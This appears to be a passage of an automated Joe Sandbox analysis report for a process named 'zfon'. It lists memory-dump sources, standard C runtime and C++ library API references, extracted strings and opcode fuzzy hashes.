                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharCompareMultiStringWide__crt$freemalloc$__strncnt
                                                                                                • String ID:
                                                                                                • API String ID: 525835285-0
                                                                                                • Opcode ID: f6e00a47ca206d7a4e1b7c1a66c0737e84cf9e0c9f132774600d41b7bf988ede
                                                                                                • Instruction ID: 6a6c79c9d18bc63fc8a43960feb49ab21201abfd6b4d69c785f6981ca7bec5b0
                                                                                                • Opcode Fuzzy Hash: f6e00a47ca206d7a4e1b7c1a66c0737e84cf9e0c9f132774600d41b7bf988ede
                                                                                                • Instruction Fuzzy Hash: B3716C72F08B8286EF248F2D9840269B2E1FB45BE8F544635DB7D46BD6DF3CE4468200
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 2943138195-0
                                                                                                • Opcode ID: 7b5661194ffe89ce305229f5119f63caed1cb30a475ffb1c0b7852583c735bf0
                                                                                                • Instruction ID: 0a09b33bc68bcc8d1477e55cb03ff0257a57d8fab321dc2c8f8475376397bd22
                                                                                                • Opcode Fuzzy Hash: 7b5661194ffe89ce305229f5119f63caed1cb30a475ffb1c0b7852583c735bf0
                                                                                                • Instruction Fuzzy Hash: 7E711B72B05A46A9FB11DFA9D4601EC33B1AB4478CB804432DF0D57A99DF38E619C390
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 5079871919eeef31b104849c91ea34eddbb498ae389773a60f034b0124e3a6ee
                                                                                                • Instruction ID: 2194763111a59a687ccfe669ce5e101fcf3c69eba83c02d6694fdb12a7fb8230
                                                                                                • Opcode Fuzzy Hash: 5079871919eeef31b104849c91ea34eddbb498ae389773a60f034b0124e3a6ee
                                                                                                • Instruction Fuzzy Hash: 89918862A08A8691EF649F1DD4813BC3761FB84BC4F548036CB5E977A4EF2DE986D300
                                                                                                APIs
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E68F7
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E698F
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E69A1
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E69D6
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E69E4
                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E6A4C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memchrtolower$_errnoisspace
                                                                                                • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                • API String ID: 3508154992-2432849056
                                                                                                • Opcode ID: 52be6e07b037d6f09550230747a39371e924b433e1c7da1dee62df230f17126e
                                                                                                • Instruction ID: 61cc54c82ec4fe8cb18fefd7531b555805585e6d6cbfe7aa2531408493e6a026
                                                                                                • Opcode Fuzzy Hash: 52be6e07b037d6f09550230747a39371e924b433e1c7da1dee62df230f17126e
                                                                                                • Instruction Fuzzy Hash: 2F51C022E0DBC645EB229E2CF85037D7AE4AB45BD8F189031CBAD42395DE3CE8478700
                                                                                                APIs
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6ADC
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6B76
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6B88
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6BBB
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6BC9
                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6C27
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memchrtolower$_errnoisspace
                                                                                                • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                • API String ID: 3508154992-2432849056
                                                                                                • Opcode ID: 43815465dc66ac9b27d3f1ae7d633b0096f14b933a58eda5914f7ac150fdf0fb
                                                                                                • Instruction ID: 62c9bcdb583aed56ce2d98c53d4463063ce07b276a771294e22296c59ab78719
                                                                                                • Opcode Fuzzy Hash: 43815465dc66ac9b27d3f1ae7d633b0096f14b933a58eda5914f7ac150fdf0fb
                                                                                                • Instruction Fuzzy Hash: BC51D226E0DEC245EF259F2DF5643B96AA2AB447E4F5C4530CBBD066A4DE3CE4839300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                • API String ID: 2943138195-1464470183
                                                                                                • Opcode ID: 056f7ce24c9a02fb08967ba7ebef161081805b5f1a36d64d6cbfd7b45a579add
                                                                                                • Instruction ID: 470cc432aa34f29a1346c63569779e56d280d00bd9858ab990d401e7941b60ca
                                                                                                • Opcode Fuzzy Hash: 056f7ce24c9a02fb08967ba7ebef161081805b5f1a36d64d6cbfd7b45a579add
                                                                                                • Instruction Fuzzy Hash: AD513676E18A569AFB10CBA8E8A05BCB7B5BB043C4F504136DB0D67A98EF2CE545C740
                                                                                                APIs
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B9105A60
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9105AE7
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105B26
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105B40
                                                                                                • _Getvals.LIBCPMT ref: 00007FF8B9105C3A
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9105C41
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: ,$false$true
                                                                                                • API String ID: 2135902765-760133229
                                                                                                • Opcode ID: 67ee8f4e636e21bca307c7727e2474fd631be0ead37d0a99a3418088d2fddda1
                                                                                                • Instruction ID: 973a16b7867fbe4fa10d2e0acd8fbf67930c7910f2f734a147de3c3da89f4f87
                                                                                                • Opcode Fuzzy Hash: 67ee8f4e636e21bca307c7727e2474fd631be0ead37d0a99a3418088d2fddda1
                                                                                                • Instruction Fuzzy Hash: EE519222618BC192E761CF29F4402AAB774FB887A4F545222EBDE03765EF3CD185C700
                                                                                                APIs
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F55E3
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90F563B
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90F567A
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90F56B4
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B90F5712
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B90F5718
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B90F571D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_taskcalloc$ExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: false$true
                                                                                                • API String ID: 2349454547-2658103896
                                                                                                • Opcode ID: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
                                                                                                • Instruction ID: 421aa8544769f4fe547d103fa9146a6babc81386dfae7baf497d31c5a3ace082
                                                                                                • Opcode Fuzzy Hash: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
                                                                                                • Instruction Fuzzy Hash: 4D41DE26B09BC181EF058F28A50437D67A1AB18FE8F144631CF6D037A4DE3CE5468340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                • Instruction ID: 3fc6f86ce3c153bbf7b13a8e427834f209abd5b011d99dec537dbda8d488dc40
                                                                                                • Opcode Fuzzy Hash: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                • Instruction Fuzzy Hash: 9871C072B04A4585EF14EFA5D8443ACA3B2EB45BE8F858535CE2D1B7DCEE28D445C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                • Instruction ID: acd9a3a5a28eb7670de7044133d8a8b0cbe5346b07318aae4595f9da5c45c208
                                                                                                • Opcode Fuzzy Hash: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                • Instruction Fuzzy Hash: 37719F62F04B4985FF14EFA5D8443ACA3B6AB44BD8F448535DE2E13BD9EE38D44583A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freemallocmemcpymemmove
                                                                                                • String ID:
                                                                                                • API String ID: 3118627126-0
                                                                                                • Opcode ID: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                • Instruction ID: e3d5292c5efa772745df06b0cb06dede2f56491f86b8ba64bdfb70f86426fe43
                                                                                                • Opcode Fuzzy Hash: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                • Instruction Fuzzy Hash: 6571C122B0565184FB14BF6298047BCA772AB08BE4F980635DE3E177DCDE3A94828365
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                • Instruction ID: 7e9643776ecc64573fba65dcf0231b519422aa21ffb03f4e63b64b08050abdbe
                                                                                                • Opcode Fuzzy Hash: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                • Instruction Fuzzy Hash: 2551C366B04A4549FB14EF65E8143ACA3B2AB48BE8F844535DE3D17BDCEE3CD4468360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: 473cb218bd9dcfae363dac5d456b711c7f5da966875aa11239a6934cc367b413
                                                                                                • Instruction ID: 1bac6bb0258731db910c6f641a30561e167b203f18c0eb0dca87102ffadfd250
                                                                                                • Opcode Fuzzy Hash: 473cb218bd9dcfae363dac5d456b711c7f5da966875aa11239a6934cc367b413
                                                                                                • Instruction Fuzzy Hash: C451B122B04B5594FB14EFA5DC547ACA772BB44BE8F844535CE3D1BBDCEE2894418360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: a0b0a483a40065930cb5af480a41cea5525e6b7e5afa53a07aa8fb18f7aacd68
                                                                                                • Instruction ID: caa73eab7dd5ccf4a4483915f96dfc31433fa5bf1546f69ca299592221929198
                                                                                                • Opcode Fuzzy Hash: a0b0a483a40065930cb5af480a41cea5525e6b7e5afa53a07aa8fb18f7aacd68
                                                                                                • Instruction Fuzzy Hash: C251C122B05A5584FF14EFA5DC443AC6372BB44BA8F884635DE3D17BDCEE2894418360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: a5d4da3a4cc675d36da3e907575d5a8726f3eac4e27f902efdbd2ea72aec7a8d
                                                                                                • Instruction ID: 6628fb9607c248f540299b823e21571818948bfa3bad17bc8e4e0cea8bdca906
                                                                                                • Opcode Fuzzy Hash: a5d4da3a4cc675d36da3e907575d5a8726f3eac4e27f902efdbd2ea72aec7a8d
                                                                                                • Instruction Fuzzy Hash: A651CF26B04B5584FB14EFA5DC543ACA3B2BB48BE8F944635CE3D17BDCEE2894418360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: abort$AdjustPointermemmove
                                                                                                • String ID:
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$free$mallocmemcpymemmove
                                                                                                • String ID: c
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_allocmemset
                                                                                                • String ID: www.battle.net
                                                                                                APIs
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B9105C89
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9105D10
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105D4F
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105D69
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9105E3A
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: ,$false$true
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
